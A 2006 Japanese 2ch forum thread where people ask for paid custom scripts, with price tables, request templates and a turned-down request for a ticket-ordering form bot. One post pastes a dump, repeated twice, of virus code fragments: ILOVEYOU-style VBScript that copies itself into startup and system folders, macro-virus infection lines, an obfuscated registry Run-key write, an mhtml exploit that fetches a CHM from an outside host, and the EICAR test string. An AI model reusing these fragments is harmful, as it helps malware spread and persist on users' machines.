アルバイト感覚の軽い気持ちで請け負い、依頼しても良し。
ビジネスとして受け止め真剣に取り組んでも良し。
関連スレ
金出すから改造してよvol.1
http://pc8.2ch.net/test/read.cgi/php/1113196271/
---価格の目安---
100行程度 3000円 | 650行程度 8000円
150行程度 3500円 | 700行程度 8500円
200行程度 4000円 | 750行程度 9000円
250行程度 4500円 | 800行程度 9500円
350行程度 5000円 | 850行程度 10000円
400行程度 5500円 | 900行程度 10500円
450行程度 6000円 | 950行程度 11000円
500行程度 6500円 | 1000行程度 11500円
550行程度 7000円 |
600行程度 7500円 |
金出すからスクリプト作ってよvol.1
2006/06/17(土) 10:35:06ID:???
2006/06/17(土) 11:03:24ID:???
1001埋まるのか?
NGNG
97乙
41
2006/06/17(土) 11:15:45ID:??? 間違えた
---価格の目安---
100行程度 3000円 | 650行程度 8500円
150行程度 3500円 | 700行程度 9000円
200行程度 4000円 | 750行程度 9500円
250行程度 4500円 | 800行程度 10000円
300行程度 5000円 | 850行程度 10500円
350行程度 5500円 | 900行程度 11000円
400行程度 6000円 | 950行程度 11500円
450行程度 6500円 | 1000行程度 12000円
500行程度 7000円 |
550行程度 7500円 |
600行程度 8000円 |
---価格の目安---
100行程度 3000円 | 650行程度 8500円
150行程度 3500円 | 700行程度 9000円
200行程度 4000円 | 750行程度 9500円
250行程度 4500円 | 800行程度 10000円
300行程度 5000円 | 850行程度 10500円
350行程度 5500円 | 900行程度 11000円
400行程度 6000円 | 950行程度 11500円
450行程度 6500円 | 1000行程度 12000円
500行程度 7000円 |
550行程度 7500円 |
600行程度 8000円 |
NGNG
いい加減真面目にバイト探せば?
2006/06/17(土) 11:22:51ID:???
NGNG
(´;ω;`)ウッ
2006/06/17(土) 11:51:55ID:???
高校生は勉強してろ。
こんなところで小遣い稼ぎするなアフォ。
お金欲しいならコンビニやレストランでバイトしろよ。
こんなところで小遣い稼ぎするなアフォ。
お金欲しいならコンビニやレストランでバイトしろよ。
2006/06/17(土) 14:46:41ID:???
□□□■■□□□□□□□□□□□□□□□□□□□□□□□□■■□□□□□□
□□□■■■■■■□■■□□□□■■□■■■■■■■□□□■■□□□□□□
□□■■□□□■■□□■■□□□■■□□□□□□■■□□□■■□□□□□□
□■■□□□□■■□□■■□□□■■□□□□□■■□□□□■■□□□□□■
■■□□□□■■□□□□□□□■■□□□□□□■■□□□□■■□□□□■■
□□□□□□■■□□□□□□□■■□□□□□■■■□□□□■■□□□■■□
□□□□□■■□□□□□□□■■□□□□□■■□■■□□□■■□□■■□□
□□□■■■□□□□□□■■■□□□□□■■□□□■■□□■■■■■□□□
□■■■□□□□□□■■■□□□□□■■■□□□□□■■□■■■□□□□□
□□□■■■■■■□■■□□□□■■□■■■■■■■□□□■■□□□□□□
□□■■□□□■■□□■■□□□■■□□□□□□■■□□□■■□□□□□□
□■■□□□□■■□□■■□□□■■□□□□□■■□□□□■■□□□□□■
■■□□□□■■□□□□□□□■■□□□□□□■■□□□□■■□□□□■■
□□□□□□■■□□□□□□□■■□□□□□■■■□□□□■■□□□■■□
□□□□□■■□□□□□□□■■□□□□□■■□■■□□□■■□□■■□□
□□□■■■□□□□□□■■■□□□□□■■□□□■■□□■■■■■□□□
□■■■□□□□□□■■■□□□□□■■■□□□□□■■□■■■□□□□□
10nobodyさん
NGNG <body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
11nobodyさん
2006/06/17(土) 18:20:02ID:??? この行数って当然無意味な改行は完全に排除した上での話だよね?
12nobodyさん
2006/06/17(土) 18:40:02ID:??? い い え
13nobodyさん
2006/06/18(日) 00:11:50ID:??? 某企業(元公社)と契約した時は
1ラインあたり2000円だったなぁ
ぶっちゃけライン単価は社会的責任に比例するw
1ラインあたり2000円だったなぁ
ぶっちゃけライン単価は社会的責任に比例するw
14nobodyさん
2006/06/18(日) 18:52:35ID:??? 1万出すから、Plesk以上の鯖管理ソフト作ってくれないか?
16nobodyさん
2006/06/20(火) 19:10:43ID:??? 1行12円かよwwww インドに外注出すより破格の安さだ!!
1000行程度で12000円でまともに業務でも使えるスクリプト組んでくれるなら
おれは営業に徹して利ザヤで森ビルに住むぞ。
1000行程度で12000円でまともに業務でも使えるスクリプト組んでくれるなら
おれは営業に徹して利ザヤで森ビルに住むぞ。
17nobodyさん
2006/08/01(火) 00:19:57ID:t9If8ozv Web系プログラミングも今後はDTP界のように底辺職業と化して行くという事なのでしょうか?
18nobodyさん
2006/08/02(水) 13:39:06ID:ph+1Khid タダで作るよー
php cgi/perl javascript
が少しだけ扱える程度だけど・・・
php cgi/perl javascript
が少しだけ扱える程度だけど・・・
21nobodyさん
2006/08/02(水) 18:02:27ID:??? じゃあ動画をupしたらFLVに変換して再生してくれるタイプのプログラムをお願いします
22nobodyさん
2006/08/03(木) 01:44:26ID:??? ここに完成したスクリプトを晒してくれるんですか?
23nobodyさん
2006/08/03(木) 02:22:48ID:???24nobodyさん
2006/08/03(木) 02:56:31ID:??? いいなぁー
俺も欲しい
俺も欲しい
25nobodyさん
2006/08/03(木) 05:28:11ID:??? そして山田ウィルスの被害者がまた一人
2618 ◆T3XQBlBjiQ
2006/08/03(木) 07:03:59ID:???27nobodyさん
2006/08/03(木) 08:14:22ID:??? 何たら456@msn関係ってどこかでも見たなあ。
30nobodyさん
2006/08/03(木) 18:31:17ID:???3118 ◆T3XQBlBjiQ
2006/08/03(木) 21:17:16ID:??? >>28
既存サイトの名前だけあげて「○○作れますか?」
なんて聞かれても答えようがない、ごめーんちゃい
「○○みたいな○○作れますか?」とかなら答えやすい
改造依頼スレのものを参考にテンプレ作ってみた
----------
※依頼者はトリップをつけてください
■どういうスクリプトか(改造でも可)
■希望言語
■現在の進行状況
■依頼内容(期限)
■このスレなどでの配布の可否
■メールアドレス(このスレなどでの配布可の場合特に必要なし)
----------
既存サイトの名前だけあげて「○○作れますか?」
なんて聞かれても答えようがない、ごめーんちゃい
「○○みたいな○○作れますか?」とかなら答えやすい
改造依頼スレのものを参考にテンプレ作ってみた
----------
※依頼者はトリップをつけてください
■どういうスクリプトか(改造でも可)
■希望言語
■現在の進行状況
■依頼内容(期限)
■このスレなどでの配布の可否
■メールアドレス(このスレなどでの配布可の場合特に必要なし)
----------
32nobodyさん
2006/08/03(木) 21:25:47ID:???33無礼を詫びます
2006/08/03(木) 21:48:19ID:??? >>31
※依頼者はトリップをつけてください
■楽天市場やアマゾンのような通販サイトは作れますか?
■軽くて動作速い最先端の言語で
■KENTさん等のサイトに元となるソースなどはないのでしょうか?
■お任せします
■このスレなどでの配布は否
■[email protected]
※依頼者はトリップをつけてください
■楽天市場やアマゾンのような通販サイトは作れますか?
■軽くて動作速い最先端の言語で
■KENTさん等のサイトに元となるソースなどはないのでしょうか?
■お任せします
■このスレなどでの配布は否
■[email protected]
34無礼を詫びます ◆CiK4l.VRCk
2006/08/03(木) 22:21:16ID:??? ■楽天市場やアマゾンのような通販サイトは作れますか?
■軽くて動作速い最先端の言語で
■KENTさん等のサイトに元となるソースなどはないのでしょうか?
■お任せします
■このスレなどでの配布は否
■[email protected]
■軽くて動作速い最先端の言語で
■KENTさん等のサイトに元となるソースなどはないのでしょうか?
■お任せします
■このスレなどでの配布は否
■[email protected]
3518 ◆T3XQBlBjiQ
2006/08/04(金) 00:54:53ID:??? >>32
CGIに限定してないからなぁ・・・
>>33
ちょ、ちょっと待って
・・・サイト・・・?
あと
>楽天市場やアマゾンのような
>軽くて動作速い最先端の言語で
もっと具体的にお願いします。
テンプレ修正
----------
※依頼者はトリップをつけてください
[1]■どういうスクリプトか(具体的に書いてください、改造でも可)
[2]■希望言語(言語名)
[3]■現在の進行状況
[4]■サーバーの情報(作成するにあたって必要な情報全て)
[5]■依頼内容(アバウトでもいいので期限は必ず書いてください)
[6]■このスレなどでの配布の可否
[7]■メールアドレス(このスレなどでの配布可の場合特に必要なし)
----------
CGIに限定してないからなぁ・・・
>>33
ちょ、ちょっと待って
・・・サイト・・・?
あと
>楽天市場やアマゾンのような
>軽くて動作速い最先端の言語で
もっと具体的にお願いします。
テンプレ修正
----------
※依頼者はトリップをつけてください
[1]■どういうスクリプトか(具体的に書いてください、改造でも可)
[2]■希望言語(言語名)
[3]■現在の進行状況
[4]■サーバーの情報(作成するにあたって必要な情報全て)
[5]■依頼内容(アバウトでもいいので期限は必ず書いてください)
[6]■このスレなどでの配布の可否
[7]■メールアドレス(このスレなどでの配布可の場合特に必要なし)
----------
36nobodyさん
2006/08/08(火) 02:37:56ID:??? ■アマゾンの通販サイトに楽天の会員制を付けたサイトは作れますか?
■mod_perl SpeedyCGI
ここの1を参照http://pc8.2ch.net/test/read.cgi/php/1149505269/l50
■KENTさん等のサイトに元となるソースなどはないのでしょうか?
■お任せします
■このスレなどでの配布は否
■[email protected]
■mod_perl SpeedyCGI
ここの1を参照http://pc8.2ch.net/test/read.cgi/php/1149505269/l50
■KENTさん等のサイトに元となるソースなどはないのでしょうか?
■お任せします
■このスレなどでの配布は否
■[email protected]
37nobodyさん
2006/08/08(火) 10:22:48ID:??? >>18ではないが>>36は論外なので添削してやろう。
> ■アマゾンの通販サイトに楽天の会員制を付けたサイトは作れますか?
『アマゾンの通販サイト』では分からん。具体的にどういう機能を要求するのか簡潔かつ詳細に箇条書きで書け。
『楽天の会員制』では分からん。具体的にどういう機能なのか簡潔かつ詳細に箇条書きで書け。
> ■KENTさん等のサイトに元となるソースなどはないのでしょうか?
正直に
「モデルになるスクリプトは自分では探していませんし
探す気も毛頭無いので自力で見付けてくるかフルスクラッチでよろしく」
と書け。
> ■お任せします
素直に
「期限は敢えて定めません。引き受けてくれるまで粘着するだけですのでよろしく」
と書け。
> ■このスレなどでの配布は否
素直に
「著作権は完全に譲渡させた上で類似のスクリプトを再開発・配布するのは禁止、
後の不具合修正や機能拡張のサポートも全て無料でやってもらうつもりですし
もちろん何らかの損害が発生した場合には賠償も請求するのでよろしく」
と書け。
> ■[email protected]
http://pc8.2ch.net/test/read.cgi/php/1113196271/959-
で正体がバレたからって今更アドレス変えて取り繕えるとか思うなYO!
つーかお前が立てた糞スレの責任を取れ。んでもってとっとと三戦板に帰れ。
期限はお任せらしいから、>>18には今から3秒後にでも設定してさっさと流す事をお勧めしとく。
> ■アマゾンの通販サイトに楽天の会員制を付けたサイトは作れますか?
『アマゾンの通販サイト』では分からん。具体的にどういう機能を要求するのか簡潔かつ詳細に箇条書きで書け。
『楽天の会員制』では分からん。具体的にどういう機能なのか簡潔かつ詳細に箇条書きで書け。
> ■KENTさん等のサイトに元となるソースなどはないのでしょうか?
正直に
「モデルになるスクリプトは自分では探していませんし
探す気も毛頭無いので自力で見付けてくるかフルスクラッチでよろしく」
と書け。
> ■お任せします
素直に
「期限は敢えて定めません。引き受けてくれるまで粘着するだけですのでよろしく」
と書け。
> ■このスレなどでの配布は否
素直に
「著作権は完全に譲渡させた上で類似のスクリプトを再開発・配布するのは禁止、
後の不具合修正や機能拡張のサポートも全て無料でやってもらうつもりですし
もちろん何らかの損害が発生した場合には賠償も請求するのでよろしく」
と書け。
> ■[email protected]
http://pc8.2ch.net/test/read.cgi/php/1113196271/959-
で正体がバレたからって今更アドレス変えて取り繕えるとか思うなYO!
つーかお前が立てた糞スレの責任を取れ。んでもってとっとと三戦板に帰れ。
期限はお任せらしいから、>>18には今から3秒後にでも設定してさっさと流す事をお勧めしとく。
39nobodyさん
2006/08/08(火) 18:21:09ID:??? 単なる夏休みの宿題の釣りだろが
41第八 ◆m2eJmVs8Pc
2006/08/08(火) 21:03:31ID:Dv8w1C5Z 【. CGI名 .】 POTI-board v1.32
【配布先URL】 http://www.punyu.net/
【. 置き場所 .】 http://www.punyu.net/php/oekaki.php
【. 依頼内容 】 過去ログ自動生成機能の追加
価格は行数が解らないので、改造して下さる方から提示をお願いします。
相場はお支払いできる予定ですが、
500行以下でやっていただけると助かります。
[email protected]
【配布先URL】 http://www.punyu.net/
【. 置き場所 .】 http://www.punyu.net/php/oekaki.php
【. 依頼内容 】 過去ログ自動生成機能の追加
価格は行数が解らないので、改造して下さる方から提示をお願いします。
相場はお支払いできる予定ですが、
500行以下でやっていただけると助かります。
[email protected]
42nobodyさん
2006/08/08(火) 21:10:41ID:???43nobodyさん
2006/08/08(火) 22:53:10ID:??? >>41
丸投げに書いてた人だよね?
色んなものを集めないと動かないっぽいからやらなかったんだけど
テンプレとかアブレットだとかをまとめて動く状態のスクリプト群を
圧縮してうpしてくれたら暇な時にやってみる
#ただし出来るかどうかわからない
もし出来た時はお金は要らないからジャワ島の被災者用でも何でもいいからお金を全額募金して
丸投げに書いてた人だよね?
色んなものを集めないと動かないっぽいからやらなかったんだけど
テンプレとかアブレットだとかをまとめて動く状態のスクリプト群を
圧縮してうpしてくれたら暇な時にやってみる
#ただし出来るかどうかわからない
もし出来た時はお金は要らないからジャワ島の被災者用でも何でもいいからお金を全額募金して
45第八 ◆m2eJmVs8Pc
2006/08/08(火) 23:38:57ID:Dv8w1C5Z46第八 ◆m2eJmVs8Pc
2006/08/09(水) 00:16:22ID:??? 必要なファイルをまとめてうぷしました。
ttp://mona2ch.net/potiboard.zip
設置は以下を参照してやりました。
ttp://www.punyu.net/php/readme.php?txt=potisetup2
どうかよろしくお願いします。
ttp://mona2ch.net/potiboard.zip
設置は以下を参照してやりました。
ttp://www.punyu.net/php/readme.php?txt=potisetup2
どうかよろしくお願いします。
2006/08/10(木) 04:04:36ID:???
【依頼】
報酬:\1,000〜\2,000くらい?
とあるページのちょっとしたスクリプト(たぶんJavaScript)を自分のHPに埋め込みたい
(スクリプト知らないけど埋め込む機械的な方法を教えて欲しい)
スクリプトの仕組みを知っている人なら10分もかからないかもしれないです。
公には明らかにできないのでとりあえずメールください。
報酬:\1,000〜\2,000くらい?
とあるページのちょっとしたスクリプト(たぶんJavaScript)を自分のHPに埋め込みたい
(スクリプト知らないけど埋め込む機械的な方法を教えて欲しい)
スクリプトの仕組みを知っている人なら10分もかからないかもしれないです。
公には明らかにできないのでとりあえずメールください。
2006/08/10(木) 04:22:32ID:???
関連スレ
金出すから改造してよvol.2
http://pc8.2ch.net/test/read.cgi/php/1154946861/l50
プログラム板
金出すから改造してよ in ムー板 vol.1
http://pc8.2ch.net/test/read.cgi/tech/1146407304/l50
金出すから改造してよvol.2
http://pc8.2ch.net/test/read.cgi/php/1154946861/l50
プログラム板
金出すから改造してよ in ムー板 vol.1
http://pc8.2ch.net/test/read.cgi/tech/1146407304/l50
2006/08/10(木) 05:54:38ID:???
【解決済み報告】
47です
既に解決したので、依頼要望は締め切りました。
47です
既に解決したので、依頼要望は締め切りました。
50nobodyさん
2006/08/10(木) 16:42:54ID:??? >>41
ちょっとみたけどできそう。
img.logが一定量で上書きされて最新のデータしか残らないから
全部のデータを保存したいってことだよね?
1.ログファイルと画像だけ別ファイルに出力。
2.img.logのデータを削除しないようにする。
とりあえず、config.phpの216行目
define(LOG_MAX, '400');
を
define(LOG_MAX, '65536');
にしたら当分は消えないとおもうんだけどどうよ?
ちょっとみたけどできそう。
img.logが一定量で上書きされて最新のデータしか残らないから
全部のデータを保存したいってことだよね?
1.ログファイルと画像だけ別ファイルに出力。
2.img.logのデータを削除しないようにする。
とりあえず、config.phpの216行目
define(LOG_MAX, '400');
を
define(LOG_MAX, '65536');
にしたら当分は消えないとおもうんだけどどうよ?
5150
2006/08/10(木) 16:48:07ID:??? やば。これスタティックにhtml吐いてるね。img.logは関係ないや。ごめん。
とりあえずもうちょっとのぞいてみる。
とりあえずもうちょっとのぞいてみる。
プログラムのことほとんどわからなくてすいませんが
作っていただきたい物があります。
株取引のようなシステムを作ってほしいのですができる方いますか?
株をしらない方も多いと思うので
どういう機能が欲しいか詳しくはまた後日こちらに書きます。
大体の行数と予算の見積もりを教えていただけるとうれしいです
作っていただきたい物があります。
株取引のようなシステムを作ってほしいのですができる方いますか?
株をしらない方も多いと思うので
どういう機能が欲しいか詳しくはまた後日こちらに書きます。
大体の行数と予算の見積もりを教えていただけるとうれしいです
55 ◆TJ9qoWuqvA
2006/08/14(月) 00:30:37ID:tSf3+IfF ttp://aaabbbcccddd.seesaa.net/
とりあえず簡単に説明文作ってみました
できれば株取引を行ったことのある方だと話が早いのですが・・・
これを読んで無理だというところやわからないところがあれば指摘してください
できる範囲だけでも協力などでもOKです
金銭的には
@一定額支払い
Aサイト運営による利益から当方と折半(支払い最低額 事前交渉アリ)
@Aお好きなほうを選んでいただいて結構です
興味をもたれた方レスお願いします。
なお運営社側の人数が増えれば増えるほど折半したさいの一人当たりのお金は減ります
当たり前ですがこれでアイデアのすべてではありませんが、
とりあえずこれだけは必須の部分です
(人数的なところはいろいろあるでしょうが。。。)
参考URL
芸能証券
ttp://www.gse.jp/
sold out(CGIでアイテムの売買をするゲームです)
ttp://www.mutoys.com/
この二つの中間的な位置に建つものだと思います
とりあえず簡単に説明文作ってみました
できれば株取引を行ったことのある方だと話が早いのですが・・・
これを読んで無理だというところやわからないところがあれば指摘してください
できる範囲だけでも協力などでもOKです
金銭的には
@一定額支払い
Aサイト運営による利益から当方と折半(支払い最低額 事前交渉アリ)
@Aお好きなほうを選んでいただいて結構です
興味をもたれた方レスお願いします。
なお運営社側の人数が増えれば増えるほど折半したさいの一人当たりのお金は減ります
当たり前ですがこれでアイデアのすべてではありませんが、
とりあえずこれだけは必須の部分です
(人数的なところはいろいろあるでしょうが。。。)
参考URL
芸能証券
ttp://www.gse.jp/
sold out(CGIでアイテムの売買をするゲームです)
ttp://www.mutoys.com/
この二つの中間的な位置に建つものだと思います
56nobodyさん
2006/08/14(月) 01:24:33ID:??? 2ch株式証券取引所を始めとして類似品が大量に存在するだろうし
この程度のものを運営して利益が出せるとも思えんが、
本気でやるならまずは1から10まで一通り書いた仕様書を出さないと。
こんなアイデアの断片じゃダメだ。
この程度のものを運営して利益が出せるとも思えんが、
本気でやるならまずは1から10まで一通り書いた仕様書を出さないと。
こんなアイデアの断片じゃダメだ。
>>56
あのですね・・・
株を知らない人に一から全部説明するのがどれほど大変かわかりますか?
また同じようにプログラムをまったくわからない私が
そのシステムの大変さは理解できないわけです。
1〜10まですべて書いた仕様書を出すのは
1〜2までの仕様をクリアできるという目星がたってからでいいのではないでしょうか?
そうでないとすべてが無駄になりますよね?
細かい部分はまだたくさんありますがとりあえず上記の根幹の部分が組み立てれるか?
それとも再構築しなおさなきゃいけないかで徐々に全体像を描いていけば良いのではないでしょうか?
あのですね・・・
株を知らない人に一から全部説明するのがどれほど大変かわかりますか?
また同じようにプログラムをまったくわからない私が
そのシステムの大変さは理解できないわけです。
1〜10まですべて書いた仕様書を出すのは
1〜2までの仕様をクリアできるという目星がたってからでいいのではないでしょうか?
そうでないとすべてが無駄になりますよね?
細かい部分はまだたくさんありますがとりあえず上記の根幹の部分が組み立てれるか?
それとも再構築しなおさなきゃいけないかで徐々に全体像を描いていけば良いのではないでしょうか?
58nobodyさん
2006/08/14(月) 01:55:09ID:???60nobodyさん
2006/08/14(月) 02:43:15ID:??? >>57
> 株を知らない人に一から全部説明するのがどれほど大変かわかりますか?
それができないなら帰れ。ここにはエスパーは居ない。
お前の見た夢を他人に理解させる努力を怠るというのなら
お前にプログラム、しかもよりによってゲームの仕様書なんて永久に無理。
> また同じようにプログラムをまったくわからない私が
> そのシステムの大変さは理解できないわけです。
実現可能かどうかはプログラマが判断する。お前の素人考えなんて誰もアテにしない。
制作難度なんぞ現時点ではまだ考慮しなくていいから、お前の脳内に咲いたお目出たい色の花を
誰 が 読 ん で も 完 璧 に 理 解 で き る よ う に 簡 潔 か つ 詳 細 に
説明しろ。勿論「○×のような〜」といった比喩表現だけで片付けるのは厳禁だ。
はっきり言うけど、お前の脳内で展開されているアイデアは
実際にはどこかで破綻している可能性が極めて高い。
もしも現状のまま明確なモデルも無しに開発を始めてしまったら
やがて次から次へとシステムデザインのレベルで問題点が噴出してきて
それの修正と、それに平行して突発的に沸くお前の糞のような追加アイデアの数々で
嫌になるほど後出しの仕様変更をお見舞いされて
まず確実に当初のコストを大幅に上回って納期もオーバーする事になる。
そんな依頼を一体誰が受けると思う?
> 株を知らない人に一から全部説明するのがどれほど大変かわかりますか?
それができないなら帰れ。ここにはエスパーは居ない。
お前の見た夢を他人に理解させる努力を怠るというのなら
お前にプログラム、しかもよりによってゲームの仕様書なんて永久に無理。
> また同じようにプログラムをまったくわからない私が
> そのシステムの大変さは理解できないわけです。
実現可能かどうかはプログラマが判断する。お前の素人考えなんて誰もアテにしない。
制作難度なんぞ現時点ではまだ考慮しなくていいから、お前の脳内に咲いたお目出たい色の花を
誰 が 読 ん で も 完 璧 に 理 解 で き る よ う に 簡 潔 か つ 詳 細 に
説明しろ。勿論「○×のような〜」といった比喩表現だけで片付けるのは厳禁だ。
はっきり言うけど、お前の脳内で展開されているアイデアは
実際にはどこかで破綻している可能性が極めて高い。
もしも現状のまま明確なモデルも無しに開発を始めてしまったら
やがて次から次へとシステムデザインのレベルで問題点が噴出してきて
それの修正と、それに平行して突発的に沸くお前の糞のような追加アイデアの数々で
嫌になるほど後出しの仕様変更をお見舞いされて
まず確実に当初のコストを大幅に上回って納期もオーバーする事になる。
そんな依頼を一体誰が受けると思う?
61nobodyさん
2006/08/14(月) 15:00:38ID:??? 1=58=59=60
あいたたた。。。
あいたたた。。。
64nobodyさん
2006/08/14(月) 19:54:35ID:??? そういや、残念!って言う何とかって芸人、最近見ないね。
65nobodyさん
2006/08/14(月) 20:07:51ID:??? ってかなにここw
2人しかいないの?
1痛いな
2人しかいないの?
1痛いな
6635(18) ◆T3XQBlBjiQ
2006/08/15(火) 01:46:28ID:???68nobodyさん
2006/08/16(水) 10:24:24ID:??? 予算5〜10万円と予想w
69nobodyさん
2006/08/16(水) 21:46:39ID:??? この企画が成功するには、依頼者が株や経済を極めていて、十分な予算があって、依頼者又は作成者がゲーム設計に精通してなきゃだめだな。
依頼者は文章からして厨だが、厨だろうと能力と資本があれば十分成り立つ。
ただ能力を持った厨を今までにあまり見たことないが
依頼者は文章からして厨だが、厨だろうと能力と資本があれば十分成り立つ。
ただ能力を持った厨を今までにあまり見たことないが
70nobodyさん
2006/08/19(土) 16:12:09ID:p8btWkYH >>55
貴方の出来ることは何でしょうか?
教えていただけませんか?
私はネットワーク、サーバ、データベース、プログラミング
の基礎的な部分は理解し、簡単なwebアプリなら組めます。
得意な事は政治です。主に政策と国民の政策判断との関係を分析するのが得意です。
経済に付いては政治とからんだ基礎的な事なら分かります。
仮に協力できたとしてもグラフィック部分はどうしますか?
私はデザインセンスがなくうまくデザインできません。
もしかしたら、協力できるかもしれません。
連絡先をお願いします。
貴方の出来ることは何でしょうか?
教えていただけませんか?
私はネットワーク、サーバ、データベース、プログラミング
の基礎的な部分は理解し、簡単なwebアプリなら組めます。
得意な事は政治です。主に政策と国民の政策判断との関係を分析するのが得意です。
経済に付いては政治とからんだ基礎的な事なら分かります。
仮に協力できたとしてもグラフィック部分はどうしますか?
私はデザインセンスがなくうまくデザインできません。
もしかしたら、協力できるかもしれません。
連絡先をお願いします。
71(´・д・`)DOn'03 ◇JcpHA18Tqs
2006/08/21(月) 08:18:04ID:5A088r/n DOn'03です(´・д・`)74おともだちクラブ(・∀・)@自己紹介
http://life7.2ch.net/test/read.cgi/intro/1155730727/
http://life7.2ch.net/test/read.cgi/intro/1155730727/
72nobodyさん
2006/09/14(木) 00:37:56ID:YxZwU+6q 出会い系サイトを無料で作ってくれませんか?
73nobodyさん
2006/09/14(木) 01:22:37ID:tz3CjuAM74nobodyさん
2006/10/09(月) 17:45:03ID:iKs3PWkN 決まった文字をフォームに高速で入力するスクリプト作れますか?
オンラインショップのフォームに自動高速で入力するのがほしいんですが
オンラインショップのフォームに自動高速で入力するのがほしいんですが
76nobodyさん
2006/10/09(月) 17:49:01ID:iKs3PWkN ここは違うんですかね?
スクリプトでスレタイ検索してここが出てきたんで質問したんですが
スクリプトでスレタイ検索してここが出てきたんで質問したんですが
77nobodyさん
2006/10/09(月) 17:53:03ID:??? javascriptで出来るんじゃ無いの
78nobodyさん
2006/10/09(月) 18:05:28ID:??? javascriptはWEB制作
80nobodyさん
2006/10/09(月) 18:25:37ID:??? つーかオンラインショップのフォームに高速で一定の注文を繰り返し入力するシチュエーションって一体何?
俺には嫌がらせもしくは管理者のミスに付け込んだ極めて不快な用途しか思い付かないのだが。
俺には嫌がらせもしくは管理者のミスに付け込んだ極めて不快な用途しか思い付かないのだが。
81nobodyさん
2006/10/09(月) 18:29:30ID:??? まあ定型文としてのフォームへのワンボタン自動入力なら
既にいくつかのブラウザが機能の一部として持ってる品。
既にいくつかのブラウザが機能の一部として持ってる品。
82nobodyさん
2006/10/09(月) 21:21:02ID:L+tCteSS83nobodyさん
2006/10/09(月) 22:11:58ID:??? お前のチケットにかける情熱は自動化処理などという腐れ手法に頼るを是とする程度のものか。
あーあ、お前にはがっかりだ。
あーあ、お前にはがっかりだ。
84nobodyさん
2006/10/09(月) 22:35:47ID:ZbdtOiek 先着なんで手動だとなかなか取れないらしいんですよね
オクに手出すよりマシかなと思うんですけどどうですか?
オクに手出すよりマシかなと思うんですけどどうですか?
85nobodyさん
2006/10/09(月) 23:03:15ID:??? 知るかボケ。
お前のモラルの問題なんだからいちいち人に聞くな。
お前のモラルの問題なんだからいちいち人に聞くな。
86nobodyさん
2006/10/10(火) 13:11:25ID:??? まあこういうレースに自動処理が介入すると最終的に
人力ではあり得ないくらいに負荷が集中→サーバが落ちておまいら全員共倒れ
という結末が待ってるからな。
人力ではあり得ないくらいに負荷が集中→サーバが落ちておまいら全員共倒れ
という結末が待ってるからな。
87nobodyさん
2006/10/11(水) 20:09:09ID:J+oowDDr スクリプトはあきらめます
88nobodyさん
2006/10/11(水) 20:25:01ID:??? その方がいい。頑張って人力で勝負しな。
手間かも知れんがチケットが取れた時の喜びも大きくなるだろう。
手間かも知れんがチケットが取れた時の喜びも大きくなるだろう。
89nobodyさん
2006/10/20(金) 17:11:42ID:??? 俺が事務局だったらスクリプトで連投する馬鹿は対象外にするけどな
90nobodyさん
2006/10/20(金) 18:11:36ID:??? 同意。
まあ今回のケースでは単純に先着順だから連投する人はあまり居ないだろうけど。
一定期間内に応募から抽選で選ぶタイプなら
ひょっとすると重複するものは一票にまとめ、
さらに人口の偏りを補正して地域的に平等になるように選ぶよな。
関東地方よりも田舎から出した方が圧倒的に当たりやすいのは昔から知られた話。
まあ今回のケースでは単純に先着順だから連投する人はあまり居ないだろうけど。
